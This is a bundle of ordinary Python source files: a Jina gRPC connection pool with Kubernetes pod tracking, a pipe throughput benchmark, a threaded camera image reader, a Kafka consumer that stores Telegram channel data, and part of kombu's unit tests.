def __init__(self, logger: Optional[JinaLogger]):
self._logger = logger
# this maps deployments to shards or heads
self._deployments: Dict[str, Dict[str, Dict[int, ReplicaList]]] = {}
# dict stores last entity id used for a particular deployment, used for round robin
self._access_count: Dict[str, int] = {}
if os.name != 'nt':
os.unsetenv('http_proxy')
os.unsetenv('https_proxy')
def add_replica(self, deployment: str, shard_id: int, address: str):
self._add_connection(deployment, shard_id, address, 'shards')
def add_head(
self, deployment: str, address: str, head_id: Optional[int] = 0
): # the head_id is always 0 for now, this will change when scaling the head
self._add_connection(deployment, head_id, address, 'heads')
def get_replicas(
self, deployment: str, head: bool, entity_id: Optional[int] = None
) -> ReplicaList:
if deployment in self._deployments:
type = 'heads' if head else 'shards'
if entity_id is None and head:
entity_id = 0
return self._get_connection_list(deployment, type, entity_id)
else:
self._logger.debug(
f'Unknown deployment {deployment}, no replicas available'
)
return None
def get_replicas_all_shards(self, deployment: str) -> List[ReplicaList]:
replicas = []
if deployment in self._deployments:
for shard_id in self._deployments[deployment]['shards']:
replicas.append(
self._get_connection_list(deployment, 'shards', shard_id)
)
return replicas
async def close(self):
# Close all connections to all replicas
for deployment in self._deployments:
for entity_type in self._deployments[deployment]:
for shard_in in self._deployments[deployment][entity_type]:
await self._deployments[deployment][entity_type][
shard_in
].close()
self._deployments.clear()
def _get_connection_list(
self, deployment: str, type: str, entity_id: Optional[int] = None
) -> ReplicaList:
try:
if entity_id is None and len(self._deployments[deployment][type]) > 0:
# select a random entity
self._access_count[deployment] += 1
return self._deployments[deployment][type][
self._access_count[deployment]
% len(self._deployments[deployment][type])
]
else:
return self._deployments[deployment][type][entity_id]
except KeyError:
if (
entity_id is None
and deployment in self._deployments
and len(self._deployments[deployment][type])
):
# This can happen as a race condition when removing connections while accessing it
# In this case we don't care for the concrete entity, so retry with the first one
return self._get_connection_list(deployment, type, 0)
self._logger.debug(
f'Did not find a connection for deployment {deployment}, type {type} and entity_id {entity_id}. There are {len(self._deployments[deployment][type]) if deployment in self._deployments else 0} available connections for this deployment and type. '
)
return None
def _add_deployment(self, deployment: str):
if deployment not in self._deployments:
self._deployments[deployment] = {'shards': {}, 'heads': {}}
self._access_count[deployment] = 0
def _add_connection(
self,
deployment: str,
entity_id: int,
address: str,
type: str,
):
self._add_deployment(deployment)
if entity_id not in self._deployments[deployment][type]:
connection_list = ReplicaList()
self._deployments[deployment][type][entity_id] = connection_list
if not self._deployments[deployment][type][entity_id].has_connection(
address
):
self._logger.debug(
f'Adding connection for deployment {deployment}/{type}/{entity_id} to {address}'
)
self._deployments[deployment][type][entity_id].add_connection(address)
else:
self._logger.debug(
f'Ignoring activation of pod, {address} already known'
)
async def remove_head(self, deployment, address, head_id: Optional[int] = 0):
return await self._remove_connection(deployment, head_id, address, 'heads')
async def remove_replica(
self, deployment, address, shard_id: Optional[int] = 0
):
return await self._remove_connection(
deployment, shard_id, address, 'shards'
)
async def _remove_connection(self, deployment, entity_id, address, type):
if (
deployment in self._deployments
and entity_id in self._deployments[deployment][type]
):
self._logger.debug(
f'Removing connection for deployment {deployment}/{type}/{entity_id} to {address}'
)
connection = await self._deployments[deployment][type][
entity_id
].remove_connection(address)
if not self._deployments[deployment][type][entity_id].has_connections():
del self._deployments[deployment][type][entity_id]
return connection
return None
def __init__(self, logger: Optional[JinaLogger] = None):
self._logger = logger or JinaLogger(self.__class__.__name__)
self._connections = self._ConnectionPoolMap(self._logger)
def send_request(
self,
request: Request,
deployment: str,
head: bool = False,
shard_id: Optional[int] = None,
polling_type: PollingType = PollingType.ANY,
endpoint: Optional[str] = None,
) -> List[asyncio.Task]:
"""Send a single message to target via one or all of the pooled connections, depending on polling_type. Convenience function wrapper around send_messages
:param request: a single request to send
:param deployment: name of the Jina deployment to send the message to
:param head: If True it is send to the head, otherwise to the worker pods
:param shard_id: Send to a specific shard of the deployment, ignored for polling ALL
:param polling_type: defines if the message should be send to any or all pooled connections for the target
:param endpoint: endpoint to target with the request
:return: list of asyncio.Task items for each send call
"""
return self.send_requests(
requests=[request],
deployment=deployment,
head=head,
shard_id=shard_id,
polling_type=polling_type,
endpoint=endpoint,
)
def send_requests(
self,
requests: List[Request],
deployment: str,
head: bool = False,
shard_id: Optional[int] = None,
polling_type: PollingType = PollingType.ANY,
endpoint: Optional[str] = None,
) -> List[asyncio.Task]:
"""Send a request to target via one or all of the pooled connections, depending on polling_type
:param requests: request (DataRequest/ControlRequest) to send
:param deployment: name of the Jina deployment to send the request to
:param head: If True it is send to the head, otherwise to the worker pods
:param shard_id: Send to a specific shard of the deployment, ignored for polling ALL
:param polling_type: defines if the request should be send to any or all pooled connections for the target
:param endpoint: endpoint to target with the requests
:return: list of asyncio.Task items for each send call
"""
results = []
connections = []
if polling_type == PollingType.ANY:
connection_list = self._connections.get_replicas(deployment, head, shard_id)
if connection_list:
connections.append(connection_list.get_next_connection())
elif polling_type == PollingType.ALL:
connection_lists = self._connections.get_replicas_all_shards(deployment)
for connection_list in connection_lists:
connections.append(connection_list.get_next_connection())
else:
raise ValueError(f'Unsupported polling type {polling_type}')
for connection in connections:
task = self._send_requests(requests, connection, endpoint)
results.append(task)
return results
def send_request_once(
self,
request: Request,
deployment: str,
head: bool = False,
shard_id: Optional[int] = None,
) -> asyncio.Task:
"""Send msg to target via only one of the pooled connections
:param request: request to send
:param deployment: name of the Jina deployment to send the message to
:param head: If True it is send to the head, otherwise to the worker pods
:param shard_id: Send to a specific shard of the deployment, ignored for polling ALL
:return: asyncio.Task representing the send call
"""
return self.send_requests_once(
[request], deployment=deployment, head=head, shard_id=shard_id
)
def send_requests_once(
self,
requests: List[Request],
deployment: str,
head: bool = False,
shard_id: Optional[int] = None,
endpoint: Optional[str] = None,
) -> asyncio.Task:
"""Send a request to target via only one of the pooled connections
:param requests: request to send
:param deployment: name of the Jina deployment to send the request to
:param head: If True it is send to the head, otherwise to the worker pods
:param shard_id: Send to a specific shard of the deployment, ignored for polling ALL
:param endpoint: endpoint to target with the requests
:return: asyncio.Task representing the send call
"""
replicas = self._connections.get_replicas(deployment, head, shard_id)
if replicas:
connection = replicas.get_next_connection()
return self._send_requests(requests, connection, endpoint)
else:
self._logger.debug(
f'No available connections for deployment {deployment} and shard {shard_id}'
)
return None
def add_connection(
self,
deployment: str,
address: str,
head: Optional[bool] = False,
shard_id: Optional[int] = None,
):
"""
Adds a connection for a deployment to this connection pool
:param deployment: The deployment the connection belongs to, like 'encoder'
:param head: True if the connection is for a head
:param address: Address used for the grpc connection, format is <host>:<port>
:param shard_id: Optional parameter to indicate this connection belongs to a shard, ignored for heads
"""
if head:
self._connections.add_head(deployment, address, 0)
else:
if shard_id is None:
shard_id = 0
self._connections.add_replica(deployment, shard_id, address)
async def remove_connection(
self,
deployment: str,
address: str,
head: Optional[bool] = False,
shard_id: Optional[int] = None,
):
"""
Removes a connection to a deployment
:param deployment: The deployment the connection belongs to, like 'encoder'
:param address: Address used for the grpc connection, format is <host>:<port>
:param head: True if the connection is for a head
:param shard_id: Optional parameter to indicate this connection belongs to a shard, ignored for heads
:return: The removed connection, None if it did not exist
"""
if head:
return await self._connections.remove_head(deployment, address)
else:
if shard_id is None:
shard_id = 0
return await self._connections.remove_replica(deployment, address, shard_id)
def start(self):
"""
Starts the connection pool
"""
pass
async def close(self):
"""
Closes the connection pool
"""
await self._connections.close()
def _send_requests(
self, requests: List[Request], connection, endpoint: Optional[str] = None
) -> asyncio.Task:
# this wraps the awaitable object from grpc as a coroutine so it can be used as a task
# the grpc call function is not a coroutine but some _AioCall
async def task_wrapper(requests, stubs, endpoint):
metadata = (('endpoint', endpoint),) if endpoint else None
for i in range(3):
try:
request_type = type(requests[0])
if request_type == DataRequest and len(requests) == 1:
call_result = stubs[0].process_single_data(
requests[0], metadata=metadata
)
metadata, response = (
await call_result.trailing_metadata(),
await call_result,
)
return response, metadata
if request_type == DataRequest and len(requests) > 1:
call_result = stubs[1].process_data(requests, metadata=metadata)
metadata, response = (
await call_result.trailing_metadata(),
await call_result,
)
return response, metadata
elif request_type == ControlRequest:
call_result = stubs[2].process_control(requests[0])
metadata, response = (
await call_result.trailing_metadata(),
await call_result,
)
return response, metadata
else:
raise ValueError(
f'Unsupported request type {type(requests[0])}'
)
except AioRpcError as e:
if e.code() != grpc.StatusCode.UNAVAILABLE:
raise
elif e.code() == grpc.StatusCode.UNAVAILABLE and i == 2:
self._logger.debug(f'GRPC call failed, retries exhausted')
raise
else:
self._logger.debug(
f'GRPC call failed with StatusCode.UNAVAILABLE, retry attempt {i+1}/3'
)
return asyncio.create_task(task_wrapper(requests, connection, endpoint))
@staticmethod
def get_grpc_channel(
address: str,
options: Optional[list] = None,
asyncio: Optional[bool] = False,
https: Optional[bool] = False,
root_certificates: Optional[str] = None,
) -> grpc.Channel:
"""
Creates a grpc channel to the given address
:param address: The address to connect to, format is <host>:<port>
:param options: A list of options to pass to the grpc channel
:param asyncio: If True, use the asyncio implementation of the grpc channel
:param https: If True, use https for the grpc channel
:param root_certificates: The path to the root certificates for https, only used if https is True
:return: A grpc channel or an asyncio channel
"""
secure_channel = grpc.secure_channel
insecure_channel = grpc.insecure_channel
if asyncio:
secure_channel = grpc.aio.secure_channel
insecure_channel = grpc.aio.insecure_channel
if options is None:
options = GrpcConnectionPool.get_default_grpc_options()
if https:
credentials = grpc.ssl_channel_credentials(
root_certificates=root_certificates
)
return secure_channel(address, credentials, options)
return insecure_channel(address, options)
@staticmethod
def activate_worker_sync(
worker_host: str,
worker_port: int,
target_head: str,
shard_id: Optional[int] = None,
) -> ControlRequest:
"""
Register a given worker to a head by sending an activate request
:param worker_host: the host address of the worker
:param worker_port: the port of the worker
:param target_head: address of the head to send the activate request to
:param shard_id: id of the shard the worker belongs to
:returns: the response request
"""
activate_request = ControlRequest(command='ACTIVATE')
activate_request.add_related_entity(
'worker', worker_host, worker_port, shard_id
)
if os.name != 'nt':
os.unsetenv('http_proxy')
os.unsetenv('https_proxy')
return GrpcConnectionPool.send_request_sync(activate_request, target_head)
@staticmethod
async def activate_worker(
worker_host: str,
worker_port: int,
target_head: str,
shard_id: Optional[int] = None,
) -> ControlRequest:
"""
Register a given worker to a head by sending an activate request
:param worker_host: the host address of the worker
:param worker_port: the port of the worker
:param target_head: address of the head to send the activate request to
:param shard_id: id of the shard the worker belongs to
:returns: the response request
"""
activate_request = ControlRequest(command='ACTIVATE')
activate_request.add_related_entity(
'worker', worker_host, worker_port, shard_id
)
return await GrpcConnectionPool.send_request_async(
activate_request, target_head
)
@staticmethod
async def deactivate_worker(
worker_host: str,
worker_port: int,
target_head: str,
shard_id: Optional[int] = None,
) -> ControlRequest:
"""
Remove a given worker to a head by sending a deactivate request
:param worker_host: the host address of the worker
:param worker_port: the port of the worker
:param target_head: address of the head to send the deactivate request to
:param shard_id: id of the shard the worker belongs to
:returns: the response request
"""
activate_request = ControlRequest(command='DEACTIVATE')
activate_request.add_related_entity(
'worker', worker_host, worker_port, shard_id
)
return await GrpcConnectionPool.send_request_async(
activate_request, target_head
)
@staticmethod
def send_request_sync(
request: Request,
target: str,
timeout=100.0,
https=False,
root_certificates: Optional[str] = None,
endpoint: Optional[str] = None,
) -> Request:
"""
Sends a request synchronically to the target via grpc
:param request: the request to send
:param target: where to send the request to, like 127.0.0.1:8080
:param timeout: timeout for the send
:param https: if True, use https for the grpc channel
:param root_certificates: the path to the root certificates for https, only used if https is True
:param endpoint: endpoint to target with the request
:returns: the response request
"""
for i in range(3):
try:
with GrpcConnectionPool.get_grpc_channel(
target,
https=https,
root_certificates=root_certificates,
) as channel:
if type(request) == DataRequest:
metadata = (('endpoint', endpoint),) if endpoint else None
stub = jina_pb2_grpc.JinaSingleDataRequestRPCStub(channel)
response, call = stub.process_single_data.with_call(
request, timeout=timeout, metadata=metadata
)
elif type(request) == ControlRequest:
stub = jina_pb2_grpc.JinaControlRequestRPCStub(channel)
response = stub.process_control(request, timeout=timeout)
return response
except grpc.RpcError as e:
if e.code() != grpc.StatusCode.UNAVAILABLE or i == 2:
raise
@staticmethod
def get_default_grpc_options():
"""
Returns a list of default options used for creating grpc channels.
Documentation is here https://github.com/grpc/grpc/blob/master/include/grpc/impl/codegen/grpc_types.h
:returns: list of tuples defining grpc parameters
"""
return [
('grpc.max_send_message_length', -1),
('grpc.max_receive_message_length', -1),
]
@staticmethod
async def send_request_async(
request: Request,
target: str,
timeout: float = 1.0,
https: bool = False,
root_certificates: Optional[str] = None,
) -> Request:
"""
Sends a request asynchronously to the target via grpc
:param request: the request to send
:param target: where to send the request to, like 127.0.0.1:8080
:param timeout: timeout for the send
:param https: if True, use https for the grpc channel
:param root_certificates: the path to the root certificates for https, only u
:returns: the response request
"""
async with GrpcConnectionPool.get_grpc_channel(
target,
asyncio=True,
https=https,
root_certificates=root_certificates,
) as channel:
if type(request) == DataRequest:
stub = jina_pb2_grpc.JinaSingleDataRequestRPCStub(channel)
return await stub.process_single_data(request, timeout=timeout)
elif type(request) == ControlRequest:
stub = jina_pb2_grpc.JinaControlRequestRPCStub(channel)
return await stub.process_control(request, timeout=timeout)
@staticmethod
def create_async_channel_stub(
address,
https=False,
root_certificates: Optional[str] = None,
) -> Tuple[
jina_pb2_grpc.JinaSingleDataRequestRPCStub,
jina_pb2_grpc.JinaDataRequestRPCStub,
jina_pb2_grpc.JinaControlRequestRPCStub,
grpc.aio.Channel,
]:
"""
Creates an async GRPC Channel. This channel has to be closed eventually!
:param address: the address to create the connection to, like 127.0.0.0.1:8080
:param https: if True, use https for the grpc channel
:param root_certificates: the path to the root certificates for https, only u
:returns: DataRequest/ControlRequest stubs and an async grpc channel
"""
channel = GrpcConnectionPool.get_grpc_channel(
address,
asyncio=True,
https=https,
root_certificates=root_certificates,
)
return (
jina_pb2_grpc.JinaSingleDataRequestRPCStub(channel),
jina_pb2_grpc.JinaDataRequestRPCStub(channel),
jina_pb2_grpc.JinaControlRequestRPCStub(channel),
channel,
)
class K8sGrpcConnectionPool(GrpcConnectionPool):
"""
Manages grpc connections to replicas in a K8s deployment.
:param namespace: K8s namespace to operate in
:param client: K8s client
:param logger: the logger to use
"""
K8S_PORT_EXPOSE = 8080
K8S_PORT_IN = 8081
K8S_PORT_USES_BEFORE = 8082
K8S_PORT_USES_AFTER = 8083
def __init__(
self,
namespace: str,
client: 'kubernetes.client.CoreV1Api',
logger: JinaLogger = None,
):
super().__init__(logger=logger)
self._namespace = namespace
self._process_events_task = None
self._k8s_client = client
self._k8s_event_queue = asyncio.Queue()
self.enabled = False
from kubernetes import watch
self._api_watch = watch.Watch()
self.update_thread = Thread(target=self.run, daemon=True)
async def _fetch_initial_state(self):
namespaced_pods = self._k8s_client.list_namespaced_pod(self._namespace)
for item in namespaced_pods.items:
await self._process_item(item)
def start(self):
"""
Subscribe to the K8s API and watch for changes in Pods
"""
self._loop = get_or_reuse_loop()
self._process_events_task = asyncio.create_task(self._process_events())
self.update_thread.start()
async def _process_events(self):
await self._fetch_initial_state()
while self.enabled:
event = await self._k8s_event_queue.get()
await self._process_item(event)
def run(self):
"""
Subscribes on MODIFIED events from list_namespaced_pod AK8s PI
"""
self.enabled = True
while self.enabled:
for event in self._api_watch.stream(
self._k8s_client.list_namespaced_pod, self._namespace
):
if event['type'] == 'MODIFIED':
asyncio.run_coroutine_threadsafe(
self._k8s_event_queue.put(event['object']), self._loop
)
if not self.enabled:
break
async def close(self):
"""
Closes the connection pool
"""
self.enabled = False
if self._process_events_task:
self._process_events_task.cancel()
self._api_watch.stop()
await super().close()
@staticmethod
def _pod_is_up(item):
return item.status.pod_ip is not None and item.status.phase == 'Running'
@staticmethod
def _pod_is_ready(item):
return item.status.container_statuses is not None and all(
cs.ready for cs in item.status.container_statuses
)
async def _process_item(self, item):
try:
jina_deployment_name = item.metadata.labels['jina_deployment_name']
is_head = item.metadata.labels['pod_type'].lower() == 'head'
shard_id = (
int(item.metadata.labels['shard_id'])
if item.metadata.labels['shard_id'] and not is_head
else None
)
is_deleted = item.metadata.deletion_timestamp is not None
ip = item.status.pod_ip
port = self.K8S_PORT_IN
if (
ip
and port
and not is_deleted
and self._pod_is_up(item)
and self._pod_is_ready(item)
):
self.add_connection(
deployment=jina_deployment_name,
head=is_head,
address=f'{ip}:{port}',
shard_id=shard_id,
)
elif ip and port and is_deleted and self._pod_is_up(item):
await self.remove_connection(
deployment=jina_deployment_name,
head=is_head,
address=f'{ip}:{port}',
shard_id=shard_id,
)
except KeyError:
self._logger.debug(
f'Ignoring changes to non Jina resource {item.metadata.name}'
)
pass
@staticmethod
def _extract_port(item):
for container in item.spec.containers:
if container.name == 'executor':
return container.ports[0].container_port
return None
def is_remote_local_connection(first: str, second: str):
"""
Decides, whether ``first`` is remote host and ``second`` is localhost
:param first: the ip or host name of the first runtime
:param second: the ip or host name of the second runtime
:return: True, if first is remote and second is local
"""
try:
first_ip = ipaddress.ip_address(first)
first_global = first_ip.is_global
except ValueError:
if first == 'localhost':
first_global = False
else:
first_global = True
try:
second_ip = ipaddress.ip_address(second)
second_local = second_ip.is_private or second_ip.is_loopback
except ValueError:
if second == 'localhost':
second_local = True
else:
second_local = False
return first_global and second_local
def create_connection_pool(
k8s_connection_pool: bool = False,
k8s_namespace: Optional[str] = None,
logger: Optional[JinaLogger] = None,
) -> GrpcConnectionPool:
"""
Creates the appropriate connection pool based on parameters
:param k8s_namespace: k8s namespace the pool will live in, None if outside K8s
:param k8s_connection_pool: flag to indicate if K8sGrpcConnectionPool should be used, defaults to true in K8s
:param logger: the logger to use
:return: A connection pool object
"""
if k8s_connection_pool and k8s_namespace:
import kubernetes
from kubernetes import client
kubernetes.config.load_incluster_config()
k8s_client = client.ApiClient()
core_client = client.CoreV1Api(api_client=k8s_client)
return K8sGrpcConnectionPool(
namespace=k8s_namespace, client=core_client, logger=logger
)
else:
return GrpcConnectionPool(logger=logger)
def host_is_local(hostname):
"""
Check if hostname is point to localhost
:param hostname: host to check
:return: True if hostname means localhost, False otherwise
"""
import socket
fqn = socket.getfqdn(hostname)
if fqn in ("localhost", "0.0.0.0") or hostname == '0.0.0.0':
return True
return ipaddress.ip_address(hostname).is_loopback
|
static_pipe.py
|
import pandas
import time
import multiprocessing
import os
from buffered_pipe import Static_Pipe
def SB(Q, pipe, D):
Q.put(time.time())
list(map(pipe.send_bytes, D))
Q.put(time.time())
def test(cnt, size, Datas, ctx, method, parameters):
Q = ctx.Queue()
if method == 'Static_Pipe':
pipe_r, pipe_w = Static_Pipe(*parameters)
P = ctx.Process(target=SB, args=(Q, pipe_w, Datas))
if method == 'Pipe':
pipe_r, pipe_w = ctx.Pipe(*parameters)
P = ctx.Process(target=SB, args=(Q, pipe_w, Datas))
P.start()
Ts = []
Ts += [time.time()]
error_cnt = sum( exp != pipe_r.recv_bytes() for exp in Datas)
Ts += [time.time()]
P.join()
Ps = [Q.get() for _ in range(Q.qsize())]
return {
"error": error_cnt / cnt
, "execute delay": Ps[0] - Ts[0]
, "send time": Ps[1] - Ps[0]
, "recv time": Ts[1] - Ps[0]
, "last packet delay": Ts[1] - Ps[1]
, "ctx" : type(ctx).__name__
, "method": method
, "parameters": parameters
}
if __name__ == '__main__':
path_info = __file__.split('/')
path_info = '/'.join(path_info[path_info.index('benchmarks'):])
print(path_info)
cnt = 1000000
size = 128
Datas = [os.urandom(size) for _ in range(cnt)]
# pipe_r, pipe_w = multiprocessing.Pipe() #379780.12it/s
# pipe_r, pipe_w = Static_Pipe(size, 512, 1, 0.01) #1194458.16it/s
# pipe_r, pipe_w = Static_Pipe(size, 512, 4, 0.01) #956994.65it/s
results = []
for ctx_method in ['fork', 'spawn', 'forkserver']:
ctx = multiprocessing.get_context(ctx_method)
results += [
test(cnt, size, Datas, ctx, method = "Static_Pipe", parameters = [size, 512, 8, 8, 0.01])
, test(cnt, size, Datas, ctx, method = "Static_Pipe", parameters = [size, 512, 4, 4, 0.01])
, test(cnt, size, Datas, ctx, method = "Static_Pipe", parameters = [size, 512, 2, 2, 0.01])
, test(cnt, size, Datas, ctx, method = "Static_Pipe", parameters = [size, 512, 1, 1, 0.01])
, test(cnt, size, Datas, ctx, method = "Static_Pipe", parameters = [size, 64, 8, 8, 0.01])
, test(cnt, size, Datas, ctx, method = "Static_Pipe", parameters = [size, 64, 4, 4, 0.01])
, test(cnt, size, Datas, ctx, method = "Static_Pipe", parameters = [size, 64, 2, 2, 0.01])
, test(cnt, size, Datas, ctx, method = "Static_Pipe", parameters = [size, 64, 1, 1, 0.01])
, test(cnt, size, Datas, ctx, method = "Pipe", parameters = [True])
, test(cnt, size, Datas, ctx, method = "Pipe", parameters = [False])
]
df = pandas.DataFrame(results)
print(df.to_string())
|
camera_image_source.py
|
import time
from threading import Condition
from threading import Thread
import arc852.cli_args as cli
from arc852.camera import Camera
from arc852.generic_image_source import GenericImageSource
class CameraImageSource(GenericImageSource):
args = [cli.usb_camera, cli.usb_port]
def __init__(self, usb_camera, usb_port):
super(CameraImageSource, self).__init__()
self.__cond = Condition()
self.__cv2_img = None
self.__cam = Camera(usb_camera=usb_camera, usb_port=usb_port)
def start(self):
Thread(target=self.__read_image).start()
def stop(self):
self.__cam.close()
def __read_image(self):
while self.__cam.is_open():
self.__cond.acquire()
self.__cv2_img = self.__cam.read()
if self.__cv2_img is None:
# logger.error("Null image read from camera")
time.sleep(.5)
else:
self.__cond.notify()
self.__cond.release()
def get_image(self):
self.__cond.acquire()
while self.__cv2_img is None:
self.__cond.wait()
retval = self.__cv2_img
self.__cv2_img = None
self.__cond.release()
return retval
|
main.py
|
import json
import threading
from broker import init_kafka_consumer, KafkaTopics
from database import *
import logging
import os
KAFKA_BROKER_INSTANCES = os.environ["KAFKA_BROKER_INSTANCES"].split(",")
LOG_LEVEL = os.environ["LOG_LEVEL"]
logging.basicConfig(level=logging.ERROR, format='%(asctime)s %(levelname)s %(message)s')
logger = logging.getLogger()
if LOG_LEVEL:
level_name = logging.getLevelName(LOG_LEVEL.upper())
logger.setLevel(level_name)
lock = threading.Lock()
class SingletonMeta(type):
""" Singleton metaclass - Implemented with a lock to ensure thread safety."""
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
with lock:
if cls not in cls._instances:
cls._instances[cls] = super(SingletonMeta, cls).__call__(*args, **kwargs)
return cls._instances[cls]
class SingletonConsumer(metaclass=SingletonMeta):
""" Singleton class - Implementing kafka consumer in a singleton class to ensure only one instance of consumer is open at a time."""
def get_consumer(self,topic):
consumer = init_kafka_consumer(KAFKA_BROKER_INSTANCES, topic)
return consumer
pass
def consume_msgs(topic):
sglcr = SingletonConsumer()
consumer = sglcr.get_consumer(topic)
if not consumer:
logger.error(f"Failed to initialize a consumer for the topic {topic}")
return
for msg in consumer:
try:
msg_json = json.loads(msg.value)
if topic == KafkaTopics.TGMESSAGES.value:
logger.info(f"Retrieved a telegram message from kafka: {msg_json}")
insert_message(msg_json)
elif topic == KafkaTopics.TGCHANNEL_EVENTS.value:
logger.info(f"Retrieved a telegram channel / chat event from kafka: {msg_json}")
insert_chat_event(msg_json)
elif topic == KafkaTopics.TGCHANNEL_LINKS.value:
logger.info(f"Retrieved a telegram invitational link from kafka: {msg_json}")
insert_link_data(msg_json, msg=None, channel_entity=None, from_config=False)
elif topic == KafkaTopics.TGCHANNEL_INFO.value:
logger.info(f"Retrieved a telegram channel information from kafka: {msg_json}")
insert_channel_descr(msg_json)
elif topic == KafkaTopics.CLIENT_INFO.value:
logger.info(f"Retrieved a client information from kafka: {msg_json}")
insert_client_info(msg_json)
elif topic == KafkaTopics.VIEWCOUNT_UPDATE.value:
logger.info(f"Retrieved a tg channel post viewcount update from kafka: {msg_json}")
update_view_count(msg_json)
except Exception as e:
logger.error(f"Failed to store a msg from topic {topic}, with the following error: {e}")
def main():
tgmessages_thread = threading.Thread(target=consume_msgs, args=([KafkaTopics.TGMESSAGES.value]))
tgmessages_thread.start() #messages
tgchannel_events_thread = threading.Thread(target=consume_msgs, args=([KafkaTopics.TGCHANNEL_EVENTS.value]))
tgchannel_events_thread.start() #events
tgchannel_info_thread = threading.Thread(target=consume_msgs, args=([KafkaTopics.TGCHANNEL_INFO.value]))
tgchannel_info_thread.start() #channel info and descr
tgchannel_links_thread = threading.Thread(target=consume_msgs, args=([KafkaTopics.TGCHANNEL_LINKS.value]))
tgchannel_links_thread.start() #channel invite links
tgchannel_participants_count_thread = threading.Thread(target=consume_msgs, args=([KafkaTopics.TGCHANNEL_PARTICIPANTS_COUNT.value]))
tgchannel_participants_count_thread.start() #channel participants count
client_info_thread = threading.Thread(target=consume_msgs, args=([KafkaTopics.CLIENT_INFO.value]))
client_info_thread.start() #channel participants count
client_info_thread = threading.Thread(target=consume_msgs, args=([KafkaTopics.VIEWCOUNT_UPDATE.value]))
client_info_thread.start() #channel participants count
if __name__ == '__main__':
main()
|
test_common.py
|
import pytest
import socket
from amqp import RecoverableConnectionError
from unittest.mock import Mock, patch
from case import ContextMock
from kombu import common
from kombu.common import (
Broadcast, maybe_declare,
send_reply, collect_replies,
declaration_cached, ignore_errors,
QoS, PREFETCH_COUNT_MAX, generate_oid
)
from t.mocks import MockPool
def test_generate_oid():
from uuid import NAMESPACE_OID
instance = Mock()
args = (1, 1001, 2001, id(instance))
ent = '%x-%x-%x-%x' % args
with patch('kombu.common.uuid3') as mock_uuid3, \
patch('kombu.common.uuid5') as mock_uuid5:
mock_uuid3.side_effect = ValueError
mock_uuid3.return_value = 'uuid3-6ba7b812-9dad-11d1-80b4'
mock_uuid5.return_value = 'uuid5-6ba7b812-9dad-11d1-80b4'
oid = generate_oid(1, 1001, 2001, instance)
mock_uuid5.assert_called_once_with(NAMESPACE_OID, ent)
assert oid == 'uuid5-6ba7b812-9dad-11d1-80b4'
def test_ignore_errors():
connection = Mock()
connection.channel_errors = (KeyError,)
connection.connection_errors = (KeyError,)
with ignore_errors(connection):
raise KeyError()
def raising():
raise KeyError()
ignore_errors(connection, raising)
connection.channel_errors = connection.connection_errors = ()
with pytest.raises(KeyError):
with ignore_errors(connection):
raise KeyError()
class test_declaration_cached:
def test_when_cached(self):
chan = Mock()
chan.connection.client.declared_entities = ['foo']
assert declaration_cached('foo', chan)
def test_when_not_cached(self):
chan = Mock()
chan.connection.client.declared_entities = ['bar']
assert not declaration_cached('foo', chan)
class test_Broadcast:
def test_arguments(self):
with patch('kombu.common.uuid',
return_value='test') as uuid_mock:
q = Broadcast(name='test_Broadcast')
uuid_mock.assert_called_with()
assert q.name == 'bcast.test'
assert q.alias == 'test_Broadcast'
assert q.auto_delete
assert q.exchange.name == 'test_Broadcast'
assert q.exchange.type == 'fanout'
q = Broadcast('test_Broadcast', 'explicit_queue_name')
assert q.name == 'explicit_queue_name'
assert q.exchange.name == 'test_Broadcast'
q2 = q(Mock())
assert q2.name == q.name
with patch('kombu.common.uuid',
return_value='test') as uuid_mock:
q = Broadcast('test_Broadcast',
'explicit_queue_name',
unique=True)
uuid_mock.assert_called_with()
assert q.name == 'explicit_queue_name.test'
q2 = q(Mock())
assert q2.name.split('.')[0] == q.name.split('.')[0]
class test_maybe_declare:
def _get_mock_channel(self):
# Given: A mock Channel with mock'd connection/client/entities
channel = Mock()
channel.connection.client.declared_entities = set()
return channel
def _get_mock_entity(self, is_bound=False, can_cache_declaration=True):
# Given: Unbound mock Entity (will bind to channel when bind called
entity = Mock()
entity.can_cache_declaration = can_cache_declaration
entity.is_bound = is_bound
def _bind_entity(channel):
entity.channel = channel
entity.is_bound = True
return entity
entity.bind = _bind_entity
return entity
def test_cacheable(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is already bound
entity = self._get_mock_entity(
is_bound=True, can_cache_declaration=True)
entity.channel = channel
entity.auto_delete = False
assert entity.is_bound, "Expected entity is bound to begin this test."
# When: Calling maybe_declare default
maybe_declare(entity, channel)
# Then: It called declare on the entity queue and added it to list
assert entity.declare.call_count == 1
assert hash(entity) in channel.connection.client.declared_entities
# When: Calling maybe_declare default (again)
maybe_declare(entity, channel)
# Then: we did not call declare again because its already in our list
assert entity.declare.call_count == 1
# When: Entity channel connection has gone away
entity.channel.connection = None
# Then: maybe_declare must raise a RecoverableConnectionError
with pytest.raises(RecoverableConnectionError):
maybe_declare(entity)
def test_binds_entities(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is not bound
entity = self._get_mock_entity()
assert not entity.is_bound, "Expected entity unbound to begin test."
# When: calling maybe_declare with default of no retry policy
maybe_declare(entity, channel)
# Then: the entity is now bound because it called to bind it
assert entity.is_bound is True, "Expected entity is now marked bound."
def test_binds_entities_when_retry_policy(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is not bound
entity = self._get_mock_entity()
assert not entity.is_bound, "Expected entity unbound to begin test."
# Given: A retry policy
sample_retry_policy = {
'interval_start': 0,
'interval_max': 1,
'max_retries': 3,
'interval_step': 0.2,
'errback': lambda x: "Called test errback retry policy",
}
# When: calling maybe_declare with retry enabled
maybe_declare(entity, channel, retry=True, **sample_retry_policy)
# Then: the entity is now bound because it called to bind it
assert entity.is_bound is True, "Expected entity is now marked bound."
def test_with_retry(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is already bound
entity = self._get_mock_entity(
is_bound=True, can_cache_declaration=True)
entity.channel = channel
assert entity.is_bound, "Expected entity is bound to begin this test."
# When calling maybe_declare with retry enabled (default policy)
maybe_declare(entity, channel, retry=True)
# Then: the connection client used ensure to ensure the retry policy
assert channel.connection.client.ensure.call_count
def test_with_retry_dropped_connection(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is already bound
entity = self._get_mock_entity(
is_bound=True, can_cache_declaration=True)
entity.channel = channel
